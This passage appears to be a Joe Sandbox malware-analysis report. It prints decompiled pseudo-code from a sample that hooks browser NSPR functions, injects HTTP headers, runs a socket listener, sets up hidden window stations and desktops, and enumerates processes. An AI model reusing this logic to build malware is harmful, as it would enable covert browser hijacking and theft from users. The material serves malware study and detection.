
Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: d42374e3e854f183e9220e0203c6cf70324e1801d62300dead0c70722f3e044b
Instruction ID: 0414ee3691f1213a766419107df9ace0e203cdfbc92eda67c98e221ccb68d850
Opcode Fuzzy Hash: d42374e3e854f183e9220e0203c6cf70324e1801d62300dead0c70722f3e044b
Instruction Fuzzy Hash: F6514072D00218AADF10EBA5DD49FDFB7BCEB08314F000567B618F7181E7789A858B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405978 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405978(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x4203dc =  *0x4203dc & 0x00000000;
				 *0x4203e0 =  *0x4203e0 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x4203c0);
				 *0x4203d8 = _a4;
				 *0x4203b4 = _a8;
				 *0x4203e4 = _a12;
				 *0x4203b8 = _t14;
				 *0x4203b0 = _a16;
				 *0x4203ac = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x4203bc = GetProcAddress( *0x4203b8, "PR_SetError");
				_t12 = GetProcAddress( *0x4203b8, "PR_GetError");
				 *0x4203a8 = _t12;
				return _t12;
			}

0x00405978
0x0040597f
0x0040598c
0x0040598e
0x00405998
0x004059a1
0x004059af
0x004059b8
0x004059c5
0x004059d7
0x004059e9
0x004059ee
0x004059f0
0x004059f6

APIs

InitializeCriticalSection.KERNEL32(004203C0,76D84EE0,00416E41,00420348), ref: 0040598E
GetProcAddress.KERNEL32(?,PR_GetNameForIdentity), ref: 004059CA
GetProcAddress.KERNEL32(PR_SetError), ref: 004059DC
GetProcAddress.KERNEL32(PR_GetError), ref: 004059EE

Strings

PR_SetError, xrefs: 004059CC
PR_GetError, xrefs: 004059DE
PR_GetNameForIdentity, xrefs: 004059AA

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 05b0b545922513d5a209f63a5c4978c67ddcb64a5b36553a7b4911c6712e0bc6
Instruction ID: 64143b5d1aa7092a0ac2eba7fb85a3796933b4f00983955d4900f94d93e08821
Opcode Fuzzy Hash: 05b0b545922513d5a209f63a5c4978c67ddcb64a5b36553a7b4911c6712e0bc6
Instruction Fuzzy Hash: C6015F75A193119FC7A0DF65ED48B067FE0EB087A5F90493AAC44E32A6D3B49442DF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040F947 Relevance: 12.2, APIs: 8, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F947(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				char _v52;
				char _v56;
				intOrPtr _v68;
				signed char* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t83;
				signed int _t86;
				void* _t90;
				void* _t94;
				void* _t98;
				signed int _t105;
				signed char* _t118;
				signed int _t119;
				struct _CRITICAL_SECTION* _t123;
				char* _t133;
				char* _t134;
				char* _t135;
				signed int _t137;
				signed int _t141;

				_v16 = _v16 | 0xffffffff;
				if(E0040F86F( &_v116, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E00412BAA( &_v116);
					return _v16;
				}
				_t83 = E00412302( &_v116);
				_v20 = _t83;
				if((1 & _t83) == 0) {
					__eflags = _t83 & 0x00000002;
					if((_t83 & 0x00000002) == 0) {
						_t123 = 0x421210;
						L18:
						__eflags = _v20 & 0x00000004;
						if((_v20 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v80;
						 *_a12 = _v76;
						EnterCriticalSection(_t123);
						_t139 = _a4;
						_t86 = E0040EEF3(_a4);
						__eflags = _t86 - 0xffffffff;
						if(_t86 != 0xffffffff) {
							L21:
							_t141 = _t86 * 0x24;
							__eflags = _t141;
							E0040868F( *((intOrPtr*)(_t141 +  *0x421228 + 8)));
							 *((intOrPtr*)(_t141 +  *0x421228 + 8)) = _v80;
							L22:
							LeaveCriticalSection(_t123);
							goto L23;
						}
						_t86 = E0040EF19(_t86, _t139);
						__eflags = _t86 - 0xffffffff;
						if(_t86 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v12 = _v12 & 0x00000000;
					_v5 = 1;
					__eflags = _v68 - 1;
					if(_v68 != 1) {
						L9:
						_t133 =  &_v56;
						_t90 = 0x1f;
						E00412ECF(_t90, _t133);
						HttpAddRequestHeadersA(_a4, _t133, 0xffffffff, 0xa0000000);
						_t134 =  &_v28;
						_t94 = 0x20;
						E00412ECF(_t94, _t134);
						HttpAddRequestHeadersA(_a4, _t134, 0xffffffff, 0x80000000);
						_t135 =  &_v52;
						_t98 = 0x21;
						E00412ECF(_t98, _t135);
						HttpAddRequestHeadersA(_a4, _t135, 0xffffffff, 0x80000000);
						L10:
						_t123 = 0x421210;
						EnterCriticalSection(0x421210);
						__eflags = _v5;
						if(_v5 == 0) {
							L14:
							E00412BFC(_v68, _v72);
							__eflags = _v12;
							if(_v12 != 0) {
								E0040A321(_v12);
							}
							L16:
							LeaveCriticalSection(_t123);
							goto L18;
						}
						_t143 = _a4;
						_t105 = E0040EEF3(_a4);
						__eflags = _t105 - 0xffffffff;
						if(_t105 != 0xffffffff) {
							L13:
							_t137 = _t105 * 0x24;
							E00412BFC( *((intOrPtr*)( *0x421228 + _t137 + 0x10)),  *((intOrPtr*)( *0x421228 + _t137 + 0xc)));
							E0040868F( *(_t137 +  *0x421228 + 0x14));
							 *(_t137 +  *0x421228 + 0x14) =  *(_t137 +  *0x421228 + 0x14) & 0x00000000;
							 *(_t137 +  *0x421228 + 0x1c) =  *(_t137 +  *0x421228 + 0x1c) & 0x00000000;
							 *(_t137 +  *0x421228 + 0x18) =  *(_t137 +  *0x421228 + 0x18) | 0xffffffff;
							 *((intOrPtr*)(_t137 +  *0x421228 + 0xc)) = _v72;
							 *((intOrPtr*)(_t137 +  *0x421228 + 0x10)) = _v68;
							 *((intOrPtr*)(_t137 +  *0x421228 + 0x20)) = _v12;
							goto L16;
						}
						_t105 = E0040EF19(_t105, _t143);
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t118 = _v72;
					__eflags =  *_t118 & 0x00000003;
					if(( *_t118 & 0x00000003) == 0) {
						goto L9;
					}
					_t119 = E00412E58(_t118,  &_v116);
					_v12 = _t119;
					__eflags = _t119;
					if(_t119 != 0) {
						_v16 = 1;
					} else {
						_v5 = _t119;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v16 = _v16 & 0x00000000;
					goto L23;
				}
			}

0x0040f950
0x0040f96b
0x0040fb37
0x0040fb3a
0x0040fb46
0x0040fb46
0x0040f974
0x0040f97c
0x0040f981
0x0040f997
0x0040f999
0x0040fad6
0x0040fadb
0x0040fadb
0x0040fadf
0x00000000
0x00000000
0x0040fae7
0x0040faf0
0x0040faf2
0x0040faf8
0x0040fafb
0x0040fb00
0x0040fb03
0x0040fb10
0x0040fb17
0x0040fb17
0x0040fb1e
0x0040fb2c
0x0040fb30
0x0040fb31
0x00000000
0x0040fb31
0x0040fb06
0x0040fb0b
0x0040fb0e
0x00000000
0x00000000
0x00000000
0x0040fb0e
0x0040f99f
0x0040f9a3
0x0040f9a6
0x0040f9a9
0x0040f9cc
0x0040f9ce
0x0040f9d1
0x0040f9d2
0x0040f9ea
0x0040f9ee
0x0040f9f1
0x0040f9f2
0x0040fa05
0x0040fa09
0x0040fa0c
0x0040fa0d
0x0040fa1b
0x0040fa1d
0x0040fa1d
0x0040fa23
0x0040fa29
0x0040fa2d
0x0040fab4
0x0040faba
0x0040fabf
0x0040fac3
0x0040fac8
0x0040fac8
0x0040facd
0x0040face
0x00000000
0x0040face
0x0040fa33
0x0040fa36
0x0040fa3b
0x0040fa3e
0x0040fa4b
0x0040fa52
0x0040fa5d
0x0040fa6b
0x0040fa75
0x0040fa7f
0x0040fa89
0x0040fa96
0x0040faa2
0x0040faae
0x00000000
0x0040faae
0x0040fa41
0x0040fa46
0x0040fa49
0x00000000
0x00000000
0x00000000
0x0040fa49
0x0040f9ab
0x0040f9ae
0x0040f9b1
0x00000000
0x00000000
0x0040f9b6
0x0040f9bb
0x0040f9be
0x0040f9c0
0x0040f9c7
0x0040f9c2
0x0040f9c2
0x0040f9c2
0x00000000
0x0040f983
0x0040f988
0x0040f98e
0x00000000
0x0040f98e

APIs

Part of subcall function 00412302: EnterCriticalSection.KERNEL32 ref: 00412322
Part of subcall function 00412302: LeaveCriticalSection.KERNEL32(00421234), ref: 004123A8

SetLastError.KERNEL32(00002F78,?), ref: 0040F988
EnterCriticalSection.KERNEL32(00421210), ref: 0040FA23
LeaveCriticalSection.KERNEL32(00421210,?), ref: 0040FACE
EnterCriticalSection.KERNEL32(00421210,?), ref: 0040FAF2
LeaveCriticalSection.KERNEL32(00421210,?), ref: 0040FB31

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: f7a19994dbe709262b8b0a3ab75910b3f37256fa8357068076fb355e22de09d6
Instruction ID: cf961ed6d742dee500c0ba3039322ec875823f965ded7ff0d8cc6fc03a502c61
Opcode Fuzzy Hash: f7a19994dbe709262b8b0a3ab75910b3f37256fa8357068076fb355e22de09d6
Instruction Fuzzy Hash: 63516E31A00209ABCB21DF69DC45AAD7BB5FB44328F14467AF814B72F1C738A956CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00408150 Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00408150(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				long _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				long _t48;
				void* _t49;
				long _t56;
				long _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				long _t69;
				void* _t72;
				long _t77;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E00419DD8(__ecx, __eflags, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					_t48 = E00419F02();
					__eflags = _t48;
					if(_t48 == 0) {
						L26:
						E0040BE5B(_v148);
						_t49 = 0;
						__eflags = 0;
						L27:
						return _t49;
					}
					E004192F3(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E00408006( &_v160, _v78,  &_v168) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 != 0) {
						L7:
						__eflags = _t94 - _v74;
						if(_t94 != _v74) {
							E0041938A( &_v124);
							_v78 = _t94;
							E004193E2( &_v128);
						}
						_v144 =  *0x421d2c;
						_t56 = _v152;
						_v172 = 1;
						__eflags = _t56;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						__eflags = _t57;
						if(_t57 != 0) {
							_t87 = _v172;
							_t20 =  &_v172;
							 *_t20 = _v172 + 1;
							__eflags =  *_t20;
							 *(_t100 + 0x2c + _v172 * 4) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						__eflags = _t59;
						if(_t59 <= 0) {
							L25:
							E0040BA2B(_t59, _v156);
							E0040BA2B(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(1) {
								__eflags = _t59 - _v172;
								if(_t59 >= _v172) {
									goto L25;
								}
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								__eflags = _t64 - _v152;
								if(_t64 != _v152) {
									__eflags = _t64 - _v160;
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											__eflags = _t97 - 0xffffffff;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E0040BA83(_t87, _t97);
											_t69 = E0040A0C9(0x20000, E00408083, _t97);
											__eflags = _t69;
											if(_t69 == 0) {
												E0040BA2B(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										__eflags = _t59;
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t77 = WaitForSingleObject( *0x421d2c, 0x3e8);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							break;
						}
						_t87 = _v74;
						_t94 = E00408006( &_v156, _v74,  &_v164) & 0x0000ffff;
						__eflags = _t94;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					__eflags = _t94;
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x00408156
0x00408161
0x00408168
0x0040816f
0x00408175
0x0040817f
0x00408184
0x00408186
0x0040831e
0x00408322
0x00408327
0x00408327
0x00408329
0x0040832f
0x0040832f
0x00408191
0x00408196
0x004081a8
0x004081ab
0x004081ae
0x004081eb
0x004081eb
0x004081f0
0x004081f7
0x00408201
0x00408206
0x00408206
0x00408210
0x00408214
0x00408218
0x00408220
0x00408222
0x00408224
0x00408228
0x00408228
0x0040822c
0x00408230
0x00408232
0x00408234
0x00408238
0x00408238
0x00408238
0x0040823c
0x0040823c
0x0040824c
0x00408252
0x00408254
0x004082fa
0x004082fe
0x00408313
0x0040831c
0x00000000
0x0040825a
0x0040825a
0x00408260
0x00408260
0x00408264
0x00000000
0x00000000
0x0040826a
0x0040826e
0x00408272
0x0040827a
0x0040827e
0x004082d2
0x004082d2
0x004082d8
0x004082da
0x004082dc
0x004082df
0x00000000
0x00000000
0x0040828d
0x004082a9
0x004082ad
0x004082b4
0x004082c4
0x004082c9
0x004082cb
0x004082cd
0x004082cd
0x004082cb
0x004082ec
0x004082f2
0x004082f4
0x00000000
0x00000000
0x00000000
0x004082f4
0x00408280
0x00408284
0x00408284
0x00000000
0x00408284
0x00408274
0x00000000
0x00408274
0x00000000
0x00408260
0x00000000
0x00000000
0x00000000
0x004081b0
0x004081b0
0x004081bb
0x004081c1
0x004081c6
0x00000000
0x00000000
0x004081c8
0x004081da
0x004081dd
0x004081e0
0x00000000
0x00000000
0x00000000
0x004081e0
0x004081e2
0x004081e5
0x00000000
0x00000000
0x00000000
0x004081e5
0x00408179
0x00000000

APIs

Part of subcall function 00419DD8: CreateMutexW.KERNEL32(004218A0,00000000,?,?,?,?), ref: 00419DF9

WaitForSingleObject.KERNEL32(000003E8,?,743C152E,00000002), ref: 004081BB
WaitForMultipleObjects.KERNEL32(000000FF,?,00000000,000000FF,?,743C152E), ref: 0040824C
accept.WS2_32(?,00000000,00000000), ref: 004082D8
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 004082EC
CloseHandle.KERNEL32(?), ref: 0040830D
CloseHandle.KERNEL32(?), ref: 0040831C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID:
API String ID: 38240579-0
Opcode ID: 9e863216c1a521c4b34297fb2806e59c9d1d16092eb0c5a26ddffac8f9b2bd84
Instruction ID: 3768ceefeb4581c64d4a9ecde3696724a9f041c566b9ab17d862f15199663342
Opcode Fuzzy Hash: 9e863216c1a521c4b34297fb2806e59c9d1d16092eb0c5a26ddffac8f9b2bd84
Instruction Fuzzy Hash: 37517C31108304ABC720EB65DD44CAFB7E9EBC8714F600A2EF9D1E21A0DB359D058B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B919 Relevance: 12.1, APIs: 8, Instructions: 115
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041B919(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				void* _v1132;
				void* _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				char _v1148;
				void* _v1149;
				char _v1169;
				void* __esi;
				int _t40;
				char* _t41;
				void* _t48;
				char* _t50;
				intOrPtr _t53;
				intOrPtr _t60;
				int _t65;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t78;

				_t78 = __eflags;
				_t68 = __edx;
				_t67 = __ecx;
				SetThreadPriority(GetCurrentThread(), 1);
				_t65 = 0;
				E00419DA0(0x2937498d,  &_v1028, 0);
				_t40 = E00419557(_t67, _t78,  &_v1040);
				if(_t40 != 0) {
					_t41 = E0041B3A3(_t67, _t68,  &_v924, 1);
					__eflags = _t41;
					if(_t41 != 0) {
						__imp__GetShellWindow();
						__eflags = _t41;
						_v1149 = _t41 != 0;
						__eflags = _v1149;
						if(_v1149 == 0) {
							_t48 = 0x7e;
							E00412F05(_t48,  &_v1148);
							_t50 =  &_v524;
							__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t50);
							__eflags = _t50;
							if(_t50 == 0) {
								_t53 = E0040DFC5( &_v1148,  &_v544,  &_v544);
								__eflags = _t53;
								if(_t53 != 0) {
									_t69 = 0x44;
									E00408742( &_v1120,  &_v1120, 0, _t69);
									_v1124 =  &_v1060;
									_v1132 = _t69;
									_t60 = E00409F5D( &_v556, 0, 0,  &_v1132,  &_v1148);
									__eflags = _t60;
									if(_t60 != 0) {
										WaitForSingleObject(_v1136, 0x1388);
										CloseHandle(_v1132);
										CloseHandle(_v1136);
										_v1169 = 1;
									}
								}
							}
						}
						SystemParametersInfoW(0x1003, _t65, _t65, _t65);
						_t65 = _v1149;
						__eflags = _t65 - 1;
						if(__eflags == 0) {
							_v1148 =  &_v924;
							_v1144 = 0x41b916;
							_v1140 = E0041B85C;
							_v1136 = E0041B85F;
							_v1132 = E0041B883;
							_v1128 = E0041B8CA;
							_v1124 = E0041B8FF;
							_v1120 = 0x41b916;
							E0041119E(__eflags, _a4,  &_v1148, _v924, _v572);
						}
					}
					E0041B60D( &_v924, 1);
					_t40 = _t65;
				}
				return _t40;
			}

0x0041b919
0x0041b919
0x0041b919
0x0041b930
0x0041b936
0x0041b946
0x0041b953
0x0041b95a
0x0041b96d
0x0041b972
0x0041b974
0x0041b988
0x0041b98e
0x0041b990
0x0041b995
0x0041b999
0x0041b9a5
0x0041b9a6
0x0041b9ab
0x0041b9b8
0x0041b9be
0x0041b9c0
0x0041b9cd
0x0041b9d2
0x0041b9d4
0x0041b9d8
0x0041b9e0
0x0041b9ec
0x0041ba04
0x0041ba08
0x0041ba0d
0x0041ba0f
0x0041ba1a
0x0041ba2a
0x0041ba30
0x0041ba32
0x0041ba32
0x0041ba0f
0x0041b9d4
0x0041b9c0
0x0041ba3f
0x0041ba45
0x0041ba49
0x0041ba4c
0x0041ba67
0x0041ba73
0x0041ba7b
0x0041ba83
0x0041ba8b
0x0041ba93
0x0041ba9b
0x0041baa3
0x0041baab
0x0041baab
0x0041ba4c
0x0041b97f
0x0041b984
0x0041b984
0x0041b961

APIs

GetCurrentThread.KERNEL32 ref: 0041B929
SetThreadPriority.KERNEL32(00000000), ref: 0041B930

Part of subcall function 00419557: OpenWindowStationW.USER32(?,00000000,10000000), ref: 0041957D
Part of subcall function 00419557: CreateWindowStationW.USER32 ref: 00419590
Part of subcall function 00419557: GetProcessWindowStation.USER32(?,0041B958,?,2937498D,?,00000000), ref: 0041959C
Part of subcall function 00419557: GetCurrentThreadId.KERNEL32 ref: 004195BD
Part of subcall function 00419557: GetThreadDesktop.USER32(00000000,?,0041B958,?,2937498D,?,00000000), ref: 004195C4
Part of subcall function 00419557: SetThreadDesktop.USER32(00000000,00000000,00000000,?,0041B958,?,2937498D,?,00000000), ref: 004195D6
Part of subcall function 00419557: CloseDesktop.USER32(00000000,00000000,00000000,?,0041B958,?,2937498D,?,00000000), ref: 004195E8
Part of subcall function 00419557: CloseWindowStation.USER32(00000000,00000000,?,0041B958,?,2937498D,?,00000000), ref: 00419601

GetShellWindow.USER32 ref: 0041B988
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0041B9B8
WaitForSingleObject.KERNEL32(?,00001388,?,00000000,00000000,?,?,?,00000000,00000044,?,?), ref: 0041BA1A
CloseHandle.KERNEL32(?), ref: 0041BA2A
CloseHandle.KERNEL32(?), ref: 0041BA30
SystemParametersInfoW.USER32 ref: 0041BA3F

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: ThreadWindow$CloseStation$Desktop$CurrentHandle$CreateFolderInfoObjectOpenParametersPathPriorityProcessShellSingleSystemWait
String ID:
API String ID: 3335517675-0
Opcode ID: 85915b7ba1e8484bdc1fd22c3f7f6ac03e14642b8c491837a93d297c04dbe29a
Instruction ID: af2722d1acbd3e2df724f36a80011d71453ef35891818c21f8a5dffd0dfa6c1c
Opcode Fuzzy Hash: 85915b7ba1e8484bdc1fd22c3f7f6ac03e14642b8c491837a93d297c04dbe29a
Instruction Fuzzy Hash: 784186B1408344AFD720AF60CD85AEBBBECEF44744F40482EF684D2151D77489899B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004051BF Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004051BF() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v588;
				void* _v596;
				void* __esi;
				void* _t42;
				int _t46;
				signed int _t48;
				void* _t49;
				long _t66;
				int _t72;
				void** _t73;
				void* _t74;

				_t72 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t72);
					_v20 = _t42;
					_v24 = _t72;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_push( &_v596);
						_v596 = 0x22c;
						_t46 = Process32FirstW(_v20);
					}
					while(_t46 != 0) {
						_t66 = _v588;
						if(_t66 <= _t72 || _t66 ==  *0x421ad8) {
							L20:
							_t46 = Process32NextW(_v20,  &_v596);
							continue;
						} else {
							_t48 = 0;
							if(_v12 <= _t72) {
								L8:
								_t49 = E00419D38(_t66, _t71, _t66);
								_v28 = _t49;
								if(_t49 != _t72) {
									_t74 = OpenProcess(0x400, _t72, _v588);
									if(_t74 != _t72) {
										_t73 = E00409CB0(_t66, _t74,  &_v32);
										CloseHandle(_t74);
										if(_t73 != 0) {
											if(_v32 ==  *0x421878 && GetLengthSid( *_t73) ==  *0x421870 && E00408700( *((intOrPtr*)( *0x42186c)),  *_t73, _t57) == 0 && E0040861A(4 + _v12 * 4,  &_v16) != 0) {
												_t71 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
												if(E00405136(_v16, _v588, _v28) != 0) {
													_v5 = 1;
												}
											}
											E0040868F(_t73);
										}
										_t72 = 0;
									}
									CloseHandle(_v28);
								}
								goto L20;
							} else {
								goto L6;
							}
							while(1) {
								L6:
								_t71 = _v16;
								if( *((intOrPtr*)(_v16 + _t48 * 4)) == _t66) {
									goto L20;
								}
								_t48 = _t48 + 1;
								if(_t48 < _v12) {
									continue;
								}
								goto L8;
							}
							goto L20;
						}
					}
					CloseHandle(_v20);
					if(_v24 != _t72) {
						continue;
					}
					break;
				}
				E0040868F(_v16);
				return _v5;
			}

0x004051d1
0x004051d3
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x004051e5
0x004051e8
0x004051ee
0x00000000
0x004051f4
0x004051fa
0x004051fe
0x00405208
0x00405208
0x00405310
0x00405212
0x0040521a
0x00405301
0x0040530b
0x00000000
0x0040522c
0x0040522c
0x00405231
0x00405245
0x00405246
0x0040524b
0x00405250
0x00405268
0x0040526c
0x0040527d
0x0040527f
0x00405283
0x0040528e
0x004052c9
0x004052d8
0x004052db
0x004052de
0x004052ee
0x004052f0
0x004052f0
0x004052ee
0x004052f5
0x004052f5
0x004052fa
0x004052fa
0x004052ff
0x004052ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00405233
0x00405233
0x00405233
0x00405239
0x00000000
0x00000000
0x0040523f
0x00405243
0x00000000
0x00000000
0x00000000
0x00405243
0x00000000
0x00405233
0x0040521a
0x0040531b
0x00405320
0x00000000
0x00000000
0x00000000
0x00405320
0x00405329
0x00405335

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004051E0
Process32FirstW.KERNEL32(?,?), ref: 00405208
OpenProcess.KERNEL32(00000400,00000000,?,?), ref: 00405262
CloseHandle.KERNEL32(00000000,00000000,?), ref: 0040527F
GetLengthSid.ADVAPI32(00000000), ref: 00405292
CloseHandle.KERNEL32(?), ref: 004052FF
Process32NextW.KERNEL32(?,0000022C), ref: 0040530B
CloseHandle.KERNEL32(?), ref: 0040531B

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: 3b2fa1e62ef1d32c5de6453984f9bd24d4311867030a45ea4b03c2845ecfd61e
Instruction ID: 7a225ee80cd9f8b45b7650f36853f2cc62ee81f40e9d9d2cb69ae453a7ebda71
Opcode Fuzzy Hash: 3b2fa1e62ef1d32c5de6453984f9bd24d4311867030a45ea4b03c2845ecfd61e
Instruction Fuzzy Hash: 5D418F30900519ABCF21EBA5DC85AAFBBB5EF85344F1001BAE415B32A1DB795D82CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046ED Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046ED(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
